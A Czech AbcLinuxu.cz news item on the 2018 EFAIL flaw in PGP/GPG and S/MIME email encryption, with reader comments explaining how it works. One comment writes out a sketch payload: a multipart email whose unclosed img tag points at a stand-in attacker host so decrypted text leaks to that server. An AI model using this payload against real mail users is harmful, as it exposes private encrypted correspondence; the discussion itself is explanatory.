abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
včera 16:44 | Zajímavý software

Na Kickstarteru lze podpořit vývoj svobodného softwarového nástroje Akira, jenž by měl umožnit designérům designování aplikací v Linuxu. Mělo by se jednat o alternativu k proprietárním nástrojům Sketch, Figma nebo Adobe XD.

Ladislav Hagara | Komentářů: 0
včera 12:11 | Zajímavý článek

V Edici CZ.NIC vyšla kniha CyberSecurity věnovaná problematice kybernetické bezpečnosti, a to především jejím základním principům, které by měl respektovat každý, kdo využívá informační a komunikační technologie. Kniha je ke stažení zcela zdarma pod licenci Creative Commons (CC BY-ND 3.0 CZ) (pdf, epub, mobi).

Ladislav Hagara | Komentářů: 0
včera 02:00 | Nová verze

Byla vydána nová stabilní verze 0.92.4 a první alfa verze verze 1.0 svobodného multiplatformního vektorového grafického editoru Inkscape. Přehled novinek v poznámkách k vydání (0.92.4 a 1.0alpha0). Obě verze jsou k dispozici také jako balíčky ve formátu AppImage. Stačí je stáhnout, nastavit právo ke spuštění a spustit.

Ladislav Hagara | Komentářů: 6
17.1. 21:22 | Nová verze

Byla vydána verze 1.32 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.

Ladislav Hagara | Komentářů: 0
17.1. 15:44 | Komunita

V říjnu byla změněna licence u multiplatformní dokumentové databáze MongoDB z GNU AGPLv3 na SSPL (Server Side Public License). Dle právníku se nejedná o svobodnou licenci. Databáze MongoDB tak nebude obsažena ve Fedoře, v Red Hat Enterprise Linuxu ani například v Debianu.

Ladislav Hagara | Komentářů: 18
17.1. 02:22 | Nová verze

Byla vydána verze 2.0 svobodné aplikace určené pro fotografování a ovládání digitálních fotoaparátů z počítače Entangle. Kódové jméno této nejnovější verze je Sodium.

Ladislav Hagara | Komentářů: 2
17.1. 01:22 | Nová verze

Byla vydána verze 2.18 svobodného webového prohlížeče pracujícího v grafickém i textovém módu Links (Wikipedie). Přehled novinek v seznamu změn. Links letos slaví 20 let. První veřejná verze 0.80 byla zveřejněna 24. listopadu 1999.

Ladislav Hagara | Komentářů: 6
16.1. 16:55 | Zajímavý článek

Vývojáři postmarketOS (GitLab) hodnotí 600 dnů vývoje tohoto v květnu 2017 představeného operačního systému pro chytré telefony vycházejícího z optimalizovaného a nakonfigurovaného Alpine Linuxu s vlastními balíčky [reddit].

Ladislav Hagara | Komentářů: 3
16.1. 15:55 | Bezpečnostní upozornění

Společnost Oracle vydala čtvrtletní bezpečnostní aktualizaci svých softwarových produktů (CPU, Critical Patch Update). Opraveno bylo celkově 284 bezpečnostních chyb. V Oracle Java SE je například opraveno 5 bezpečnostních chyb. Všechny jsou vzdáleně zneužitelné bez autentizace. V Oracle MySQL je opraveno 30 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace jsou 3 z nich.

Ladislav Hagara | Komentářů: 0
16.1. 15:44 | Komunita

Na YouTube byly zveřejněny komunitní videozáznamy přednášek z konference OpenAlt 2018. Letošní OpenAlt proběhne o víkendu 2. a 3. listopadu opět na FIT VUT v Brně.

Ladislav Hagara | Komentářů: 0
Používáte USB Type-C?
 (19%)
 (16%)
 (11%)
 (12%)
 (37%)
 (3%)
 (45%)
Celkem 403 hlasů
 Komentářů: 0
Rozcestník

Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

14.5.2018 11:22 | Ladislav Hagara | Bezpečnostní upozornění


Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

Slavko avatar 14.5.2018 11:46 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?
Conscript89 avatar 14.5.2018 12:07 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Stejne jako treba FSB, ze? :)
I can only show you the door. You're the one that has to walk through it.
Conscript89 avatar 14.5.2018 12:13 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.
I can only show you the door. You're the one that has to walk through it.
Slavko avatar 14.5.2018 15:56 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?
14.5.2018 21:12 Peter Golis | skóre: 57 | Bratislava
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
To je ten komunista?
Jendа avatar 14.5.2018 17:43 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.
Marián Kyral avatar 15.5.2018 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
A myslíš, že o tom ještě neví?
14.5.2018 12:08 elenril
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.
14.5.2018 14:20 Lyco | skóre: 12 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Protože už jsou k dispozici informace, tak přidávám shrnutí:

Je to kombinace několika věcí:
  1. mailové čtečky stahují automaticky vzdálený obsah
  2. některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
  3. I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.
Vysvětlení Odborný článek
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
Jendа avatar 14.5.2018 17:42 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
TL;DR. ELI5: Vyrobíš multipart zprávu s
<img src="https://útočník/?m=
----BOUNDARY
-----BEGIN PGP MESSAGE-----
...
-----END PGP MESSAGE-----
----BOUNDARY
">
Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.
14.5.2018 20:20 pc2005 | skóre: 37 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Poštovní klient ten vnitřek rozšifruje
Tak to je facepalm.
Jendа avatar 14.5.2018 21:42 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.
15.5.2018 09:54 pc2005 | skóre: 37 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.
Josef Kufner avatar 15.5.2018 10:01 Josef Kufner | skóre: 68
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).
Hello world ! Segmentation fault (core dumped)
15.5.2018 12:56 Lyco | skóre: 12 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
Ta chyba je na efail.de popsaná právě pro multipart maily.

Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
14.5.2018 17:53 petr
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
at nemusite cekat https://efail.de/efail-attack-paper.pdf

Založit nové vláknoNahoru


ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.